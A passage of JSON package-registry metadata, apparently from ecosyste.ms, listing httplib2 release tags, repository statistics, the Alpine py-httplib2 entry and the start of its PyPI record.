25-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T02:37:25.383Z","dependent_packages_count":3,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":10.216203373722974,"stargazers_count":3.3499643620812543,"forks_count":2.3521026372059874,"average":3.979567593252554},"purl":"pkg:apk/alpine/py-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.6","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":213,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T11:58:48.346Z","updated_at":"2023-02-01T11:58:48.346Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.6","url":"https://pkgs.alpinelinux.org/packages?branch=v3.6","ecosystem":"alpine","default":false,"packages_count":8418,"maintainers_count":115,"namespaces_count":2,"keywords_count":564,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":255},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.872Z","updated_at":"2026-08-10T05:08:21.364Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/namespaces"}},{"id":2761532,"name":"httplib2","ecosystem":"pypi","description":"A comprehensive HTTP client library.","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":null,"versions_count":45,"first_release_published_at":"2013-03-06T20:45:32.000Z","latest_release_published_at":"2026-06-26T10:13:54.000Z","latest_release_number":"0.32.0","last_synced_at":"2026-08-24T13:46:41.993Z","created_at":"2022-04-10T11:15:59.368Z","updated_at":"2026-08-24T13:46:41.994Z","registry_url":"https://pypi.org/project/httplib2/","install_command":"pip install httplib2 --index-url https://pypi.org/simple","documentation_url":"https://httplib2.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Development Status :: 4 - Beta","Environment :: Web Environment","Intended Audience :: Developers","License :: OSI Approved :: MIT License","Operating System :: OS Independent","Programming Language :: Python","Programming Language :: Python :: 